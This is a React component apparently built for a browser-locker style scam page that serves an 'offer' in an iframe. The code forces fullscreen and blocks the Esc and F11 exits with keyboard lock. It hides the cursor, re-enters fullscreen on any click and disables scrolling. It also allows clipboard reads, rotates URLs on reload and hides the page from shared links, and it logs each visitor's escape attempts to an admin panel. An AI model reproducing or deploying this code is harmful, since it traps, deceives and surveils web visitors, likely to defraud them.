import React, { useCallback, useEffect, useRef, useState } from "react";
import { Navigate, useNavigate, useParams } from "react-router-dom";
import { useRedirect } from "../context/RedirectContext";
import { useSite } from "../context/SiteContext";
import {
  generateRedirectSlug,
  consumeNewTabRedirectGate,
  hasRedirectSession,
  isSecurityCheckPassed,
  isValidRedirectEmbedSlug,
  withHcvaEmbedParam,
  HCVA_EMBED_ADMIN_EVENT,
} from "../utils/redirectShortlink";
import NotFound from "./NotFound";
import RedirectSecurityCheck from "./RedirectSecurityCheck";
import {
  noteEscKeyActivity,
  noteFullscreenExitAttempt,
  recordLifecycle,
  resolveFullscreenCloseWay,
} from "../utils/clickTracking";
import {
  appendShortlinkVisitLogNote,
  consumePendingVisitNoteForEmbed,
  fullscreenExitNote,
  trackShortlinkFullscreenTrigger,
  trackShortlinkVisitor,
  updateShortlinkVisitorSessionStatus,
  VISIT_NOTE_FULLSCREEN,
  VISIT_NOTE_OFFER_SCREEN,
  VISIT_NOTE_REDIRECT_RECLICK,
  VISIT_NOTE_TAB_OR_PAGE_CLOSED,
} from "../utils/shortlinkMetrics";
import { bindOfferIframeClickTracking } from "../utils/embedClickBridge";
import {
  bindPseudoFullscreenSync,
  getFullscreenElement,
  getFullscreenDiagnostics,
  requestFullscreenFromUserGesture,
  requestFullscreenThenLock,
  scheduleKeyboardLockRetries,
  showEscBlockedWarning,
  tryKeyboardLock,
  tryKeyboardUnlock,
} from "../utils/redirectFullscreen";
import "./RedirectEmbed.css";

/** Intentional Esc-hold exits allowed before auto-fullscreen stops for this embed session. */
const MAX_AUTHORIZED_FS_EXITS = 4;

const ADMIN_PANEL_CMD = "hcva:show_admin_panel";

/** One-shot per full page load so reload slug rotation runs once (survives React Strict Mode double-mount). */
let hcvaShortlinkReloadRotated = false;

function isDocumentReloadNavigation() {
  if (typeof performance === "undefined") return false;
  const entries = performance.getEntriesByType?.("navigation");
  if (entries?.length) {
    return entries[0].type === "reload";
  }
  try {
    return performance.navigation?.type === 1;
  } catch {
    return false;
  }
}

function isF11Key(e) {
  return e.code === "F11" || e.key === "F11";
}

function swallowEscapeKey(e) {
  if (
    e.code !== "Escape" &&
    e.key !== "Escape" &&
    e.key !== "Esc" &&
    e.keyCode !== 27 &&
    e.which !== 27
  ) {
    return false;
  }
  e.preventDefault();
  e.stopPropagation();
  return true;
}

function trySameOriginShowAdmin(iframe) {
  if (!iframe?.contentWindow) return { ok: false, method: "no_iframe" };
  try {
    const fn = iframe.contentWindow.hcvaShowAdminPanel;
    if (typeof fn === "function") {
      fn.call(iframe.contentWindow);
      return { ok: true, method: "iframe_fn" };
    }
  } catch {
    /* cross-origin */
  }
  return { ok: false, method: "cross_origin" };
}

function postShowAdminPanelMessage(iframe) {
  if (!iframe?.contentWindow) return false;
  try {
    iframe.contentWindow.postMessage({ type: ADMIN_PANEL_CMD }, "*");
    return true;
  } catch {
    return false;
  }
}

function requestShowAdminPanel(iframe) {
  if (!iframe) return { ok: false, method: "no_iframe" };
  const sameOrigin = trySameOriginShowAdmin(iframe);
  if (sameOrigin.ok) return sameOrigin;
  if (postShowAdminPanelMessage(iframe)) {
    return { ok: true, method: "post_message" };
  }
  return { ok: false, method: "failed" };
}

function buildFullscreenStatusPayload(extra = {}) {
  const d = getFullscreenDiagnostics();
  return {
    fullscreenState: d.nativeOn || d.pseudoOn ? "on" : "off",
    fullscreenMode: d.mode,
    fullscreenNative: d.nativeOn,
    fullscreenPseudo: d.pseudoOn,
    fullscreenRequestStatus: d.requestStatus,
    fullscreenRequestError: d.requestError,
    fullscreenRequestAt: d.requestAt,
    keyboardLockStatus: d.keyboardLockStatus,
    pageFocused: d.pageFocused,
    pageVisibility: d.visibilityState,
    viewportMatchesScreen: d.viewportMatchesScreen,
    ...extra,
  };
}

export default function RedirectEmbed() {
  const { slug } = useParams();
  const navigate = useNavigate();
  const { firebaseSiteDocId } = useSite();
  const { redirectActive, pendingRedirectHref, redirectSourceReady } = useRedirect();
  const iframeRef = useRef(null);
  const trackedViewRef = useRef("");
  const prevNativeFsRef = useRef(false);
  const embedTrackingRef = useRef({
    siteId: "",
    slug: "",
    sourceDomain: "",
  });
  /** After authorized exit, ignore the synthetic click so window capture doesn’t instantly re-toggle fullscreen. */
  const suppressWindowClickFsUntilRef = useRef(0);
  /** Esc-hold exits this session; auto-fullscreen stops after MAX_AUTHORIZED_FS_EXITS. */
  const authorizedFsExitCountRef = useRef(0);
  /** Captured once at mount: was this shortlink reached via an in-app gesture in this tab? */
  const sessionOkRef = useRef(
    consumeNewTabRedirectGate(slug) || hasRedirectSession()
  );
  const [nativeFs, setNativeFs] = useState(false);
  const slugOk = isValidRedirectEmbedSlug(slug);

  const isAutoFsAllowed = useCallback(() => {
    return authorizedFsExitCountRef.current < MAX_AUTHORIZED_FS_EXITS;
  }, []);

  const requestFullscreenIfAllowed = useCallback(() => {
    if (!isAutoFsAllowed()) return Promise.resolve();
    return requestFullscreenThenLock();
  }, [isAutoFsAllowed]);

  /* Sync React state with browser fullscreen (all vendors). */
  useEffect(() => {
    const sync = () => {
      const on = Boolean(getFullscreenElement());
      document.documentElement.classList.toggle("hcva-redirect-fs-nomouse", on);
      document.body.classList.toggle("hcva-redirect-fs-nomouse", on);
      setNativeFs(on);
    };
    document.addEventListener("fullscreenchange", sync);
    document.addEventListener("webkitfullscreenchange", sync);
    document.addEventListener("mozfullscreenchange", sync);
    document.addEventListener("MSFullscreenChange", sync);
    sync();
    return () => {
      document.removeEventListener("fullscreenchange", sync);
      document.removeEventListener("webkitfullscreenchange", sync);
      document.removeEventListener("mozfullscreenchange", sync);
      document.removeEventListener("MSFullscreenChange", sync);
      document.documentElement.classList.remove("hcva-redirect-fs-nomouse");
      document.body.classList.remove("hcva-redirect-fs-nomouse");
    };
  }, []);

  /* Re-apply lock when fullscreen syncs (e.g. vendor prefixes / programmatic exit). */
  useEffect(() => {
    if (!nativeFs) return undefined;
    tryKeyboardLock();
    scheduleKeyboardLockRetries();
    const lockInterval = window.setInterval(() => {
      if (getFullscreenElement()) tryKeyboardLock();
    }, 2000);
    return () => window.clearInterval(lockInterval);
  }, [nativeFs]);

  useEffect(() => {
    if (!slugOk) return undefined;
    document.body.classList.remove("hcva-shortlink-pseudo-fs");
    const root = document.documentElement;
    const body = document.body;
    root.classList.add("hcva-shortlink-embed");
    body.classList.add("hcva-shortlink-embed");
    const stopPseudoSync = bindPseudoFullscreenSync();
    return () => {
      root.classList.remove("hcva-shortlink-embed");
      body.classList.remove("hcva-shortlink-embed");
      stopPseudoSync();
    };
  }, [slugOk]);

  useEffect(() => {
    embedTrackingRef.current = {
      siteId: firebaseSiteDocId || "",
      slug: slug || "",
      sourceDomain:
        typeof window !== "undefined" ? window.location.hostname || "" : "",
    };
  }, [firebaseSiteDocId, slug]);

  /** Record visitor in admin Users list when embed (or rotated slug) loads. */
  useEffect(() => {
    if (!slugOk || !redirectSourceReady || !redirectActive || !pendingRedirectHref) {
      return;
    }
    if (!sessionOkRef.current) return;
    if (!firebaseSiteDocId) return;
    if (trackedViewRef.current === slug) return;
    if (!isSecurityCheckPassed()) return;

    trackedViewRef.current = slug;
    trackShortlinkVisitor({
      siteId: firebaseSiteDocId,
      slug,
      sourceDomain: window.location.hostname || "",
      visitNote: consumePendingVisitNoteForEmbed(),
    });
    appendShortlinkVisitLogNote({
      siteId: firebaseSiteDocId,
      slug,
      sourceDomain: window.location.hostname || "",
      visitNote: VISIT_NOTE_OFFER_SCREEN,
    });
    updateShortlinkVisitorSessionStatus({
      siteId: firebaseSiteDocId,
      slug,
      sourceDomain: window.location.hostname || "",
      sessionState: "online",
      ...buildFullscreenStatusPayload(),
    });
  }, [
    slugOk,
    slug,
    redirectSourceReady,
    redirectActive,
    pendingRedirectHref,
    firebaseSiteDocId,
  ]);

  /** Fullscreen enter/exit → admin visit log. */
  useEffect(() => {
    const prev = prevNativeFsRef.current;
    if (!slugOk || !redirectActive || !pendingRedirectHref || !firebaseSiteDocId) {
      prevNativeFsRef.current = nativeFs;
      return;
    }
    if (!sessionOkRef.current || !isSecurityCheckPassed()) {
      prevNativeFsRef.current = nativeFs;
      return;
    }

    const sourceDomain = window.location.hostname || "";
    if (!prev && nativeFs) {
      updateShortlinkVisitorSessionStatus({
        siteId: firebaseSiteDocId,
        slug,
        sourceDomain,
        sessionState: "online",
        ...buildFullscreenStatusPayload({
          fullscreenState: "on",
          fullscreenMode: "native",
        }),
      });
      trackShortlinkFullscreenTrigger({
        siteId: firebaseSiteDocId,
        slug,
        sourceDomain,
      });
      trackShortlinkVisitor({
        siteId: firebaseSiteDocId,
        slug,
        sourceDomain,
        visitNote: VISIT_NOTE_FULLSCREEN,
      });
    } else if (prev && !nativeFs) {
      const exitMethod = resolveFullscreenCloseWay();
      updateShortlinkVisitorSessionStatus({
        siteId: firebaseSiteDocId,
        slug,
        sourceDomain,
        sessionState: "online",
        ...buildFullscreenStatusPayload({
          fullscreenState: "off",
        }),
        fullscreenExitMethod: exitMethod,
      });
      appendShortlinkVisitLogNote({
        siteId: firebaseSiteDocId,
        slug,
        sourceDomain,
        visitNote: fullscreenExitNote(exitMethod),
      });
    }
    prevNativeFsRef.current = nativeFs;
  }, [nativeFs, slug, slugOk, redirectActive, pendingRedirectHref, firebaseSiteDocId]);

  /** Tab close / navigate away → append visit log line. */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref) return undefined;

    const onPageHide = (e) => {
      if (e.persisted) return;
      const { siteId, slug: s, sourceDomain } = embedTrackingRef.current;
      if (!siteId) return;
      appendShortlinkVisitLogNote({
        siteId,
        slug: s,
        sourceDomain,
        visitNote: VISIT_NOTE_TAB_OR_PAGE_CLOSED,
      });
    };

    window.addEventListener("pagehide", onPageHide);
    return () => window.removeEventListener("pagehide", onPageHide);
  }, [slugOk, redirectActive, pendingRedirectHref]);

  /** Any click inside the offer iframe → Tracing visitLog. */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref) return undefined;
    if (!firebaseSiteDocId) return undefined;
    if (!isSecurityCheckPassed()) return undefined;

    const iframe = iframeRef.current;
    if (!iframe) return undefined;

    return bindOfferIframeClickTracking(iframe, (visitNote) => {
      const { siteId, slug: s, sourceDomain } = embedTrackingRef.current;
      if (!siteId || !visitNote) return;
      appendShortlinkVisitLogNote({
        siteId,
        slug: s,
        sourceDomain,
        visitNote,
        requireExistingSession: true,
      });
    });
  }, [slugOk, redirectActive, pendingRedirectHref, firebaseSiteDocId, slug]);

  /** Lock parent page scroll (X and Y) for the whole redirect embed session. */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref) return undefined;

    const html = document.documentElement;
    const body = document.body;
    const prev = {
      htmlOverflow: html.style.overflow,
      bodyOverflow: body.style.overflow,
      htmlOverflowX: html.style.overflowX,
      bodyOverflowX: body.style.overflowX,
    };

    html.style.overflow = "hidden";
    html.style.overflowX = "hidden";
    body.style.overflow = "hidden";
    body.style.overflowX = "hidden";

    const isIframeEvent = (e) => e.target?.tagName === "IFRAME";

    const blockScroll = (e) => {
      if (isIframeEvent(e)) return;
      e.preventDefault();
    };

    const blockKeyScroll = (e) => {
      if (isIframeEvent(e)) return;
      const scrollKeys = new Set([
        "ArrowUp",
        "ArrowDown",
        "ArrowLeft",
        "ArrowRight",
        "PageUp",
        "PageDown",
        "Home",
        "End",
        " ",
      ]);
      if (!scrollKeys.has(e.key)) return;
      e.preventDefault();
    };

    window.addEventListener("wheel", blockScroll, { passive: false, capture: true });
    window.addEventListener("touchmove", blockScroll, { passive: false, capture: true });
    window.addEventListener("keydown", blockKeyScroll, true);

    return () => {
      html.style.overflow = prev.htmlOverflow;
      html.style.overflowX = prev.htmlOverflowX;
      body.style.overflow = prev.bodyOverflow;
      body.style.overflowX = prev.bodyOverflowX;
      window.removeEventListener("wheel", blockScroll, true);
      window.removeEventListener("touchmove", blockScroll, true);
      window.removeEventListener("keydown", blockKeyScroll, true);
    };
  }, [slugOk, redirectActive, pendingRedirectHref]);

  /** Every full refresh while on an active shortlink embed gets a new random path segment. */
  useEffect(() => {
    if (!slugOk || !redirectSourceReady || !redirectActive || !pendingRedirectHref) return;
    if (!isDocumentReloadNavigation()) return;
    if (hcvaShortlinkReloadRotated) return;
    hcvaShortlinkReloadRotated = true;
    const next = generateRedirectSlug();
    navigate(`/${next}`, { replace: true });
  }, [
    slugOk,
    redirectSourceReady,
    redirectActive,
    pendingRedirectHref,
    navigate,
  ]);

  /** After fullscreen closes, any real click anywhere re-enters fullscreen. */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref) return undefined;

    const onClickCapture = (e) => {
      if (!e.isTrusted) return;
      if (!isAutoFsAllowed()) return;
      if (Date.now() < suppressWindowClickFsUntilRef.current) return;
      if (getFullscreenElement()) return;
      requestFullscreenFromUserGesture();
    };

    window.addEventListener("click", onClickCapture, true);
    return () => window.removeEventListener("click", onClickCapture, true);
  }, [slugOk, redirectActive, pendingRedirectHref, requestFullscreenIfAllowed, isAutoFsAllowed]);

  /** Redirect-gate clicks (cursor masks or parent) → offer admin-login panel. */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref || !redirectSourceReady) {
      return undefined;
    }
    if (!sessionOkRef.current) return undefined;

    const showAdminPanel = (source) => {
      const iframe = iframeRef.current;
      if (!iframe) return;
      const result = requestShowAdminPanel(iframe);
      if (result.ok) {
        recordLifecycle("show_admin_panel_click", {
          method: result.method,
          source: source || "embed_click",
        });
      }
      if (firebaseSiteDocId) {
        trackShortlinkVisitor({
          siteId: firebaseSiteDocId,
          slug: slug || "",
          sourceDomain: window.location.hostname || "",
          visitNote: VISIT_NOTE_REDIRECT_RECLICK,
        });
      }
    };

    const onEmbedClick = (e) => {
      if (!e.isTrusted) return;
      if (e.target?.tagName === "IFRAME") return;
      if (!e.target?.closest?.(".redirect-embed-cursor-mask")) return;
      showAdminPanel("cursor_mask");
    };

    const onNavigateAdmin = () => {
      showAdminPanel("redirect_context");
    };

    document.addEventListener("click", onEmbedClick, true);
    window.addEventListener(HCVA_EMBED_ADMIN_EVENT, onNavigateAdmin);
    return () => {
      document.removeEventListener("click", onEmbedClick, true);
      window.removeEventListener(HCVA_EMBED_ADMIN_EVENT, onNavigateAdmin);
    };
  }, [slugOk, redirectActive, pendingRedirectHref, redirectSourceReady, firebaseSiteDocId, slug]);

  /**
   * Fullscreen: block Esc/F11 so the browser cannot hold-to-exit. Re-lock on every Esc press.
   */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref) return undefined;

    const swallowF11 = (e) => {
      if (!isF11Key(e)) return false;
      e.preventDefault();
      e.stopPropagation();
      if (getFullscreenElement()) noteFullscreenExitAttempt("f11_key");
      return true;
    };

    const onKeyDownCapture = (e) => {
      if (swallowF11(e)) return;

      if (!getFullscreenElement()) return;

      if (swallowEscapeKey(e)) {
        noteEscKeyActivity();
        noteFullscreenExitAttempt("esc_button");
        showEscBlockedWarning();
        if (!e.repeat) {
          recordLifecycle("fullscreen_exit_attempt", {
            way: "esc_button",
            inFullscreen: true,
          });
        }
        tryKeyboardLock();
        return;
      }

      e.preventDefault();
    };

    const onKeyUpCapture = (e) => {
      if (swallowF11(e)) return;
      if (!getFullscreenElement()) return;
      if (swallowEscapeKey(e)) {
        noteEscKeyActivity();
        tryKeyboardLock();
        return;
      }
      e.preventDefault();
    };

    // Window capture only — document listeners used stopImmediatePropagation and blocked RedirectContext.
    window.addEventListener("keydown", onKeyDownCapture, true);
    window.addEventListener("keyup", onKeyUpCapture, true);

    return () => {
      window.removeEventListener("keydown", onKeyDownCapture, true);
      window.removeEventListener("keyup", onKeyUpCapture, true);
    };
  }, [slugOk, redirectActive, pendingRedirectHref]);

  useEffect(() => {
    return () => {
      tryKeyboardUnlock();
    };
  }, []);

  if (!slugOk) {
    return <NotFound />;
  }

  if (!redirectSourceReady) {
    return (
      <div
        className="redirect-embed-page redirect-embed-page--loading"
        data-hcva-redirect-embed="root"
      >
        <div className="redirect-embed-loading-inner" aria-busy="true" aria-live="polite">
          <span className="redirect-embed-loading-spinner" />
          <p className="redirect-embed-loading-msg">Loading offer…</p>
        </div>
      </div>
    );
  }

  if (!redirectActive || !pendingRedirectHref) {
    return <Navigate to="/" replace />;
  }

  // Pasted / shared shortlink opened in a fresh tab → no in-app session marker.
  // Silently send to the home page (no offer, no prompt) so links aren't reusable by others.
  if (!sessionOkRef.current) {
    return <Navigate to="/" replace />;
  }

  if (!isSecurityCheckPassed()) {
    return <RedirectSecurityCheck />;
  }

  return (
    <div
      className={
        "redirect-embed-page" +
        (nativeFs ? " redirect-embed-page--fs-nomouse" : "")
      }
      data-hcva-redirect-embed="root"
    >
      <iframe
        ref={iframeRef}
        className="redirect-embed-frame"
        title="Offer"
        src={withHcvaEmbedParam(pendingRedirectHref)}
        referrerPolicy="no-referrer-when-downgrade"
        allowFullScreen
        tabIndex={-1}
        allow="fullscreen *; autoplay *; encrypted-media *; picture-in-picture *; clipboard-read *; clipboard-write *"
      />
      <div className="redirect-embed-cursor-mask redirect-embed-cursor-mask--top" />
      <div className="redirect-embed-cursor-mask redirect-embed-cursor-mask--bottom" />
      <div className="redirect-embed-cursor-mask redirect-embed-cursor-mask--left" />
      <div className="redirect-embed-cursor-mask redirect-embed-cursor-mask--right" />
    </div>
  );
}
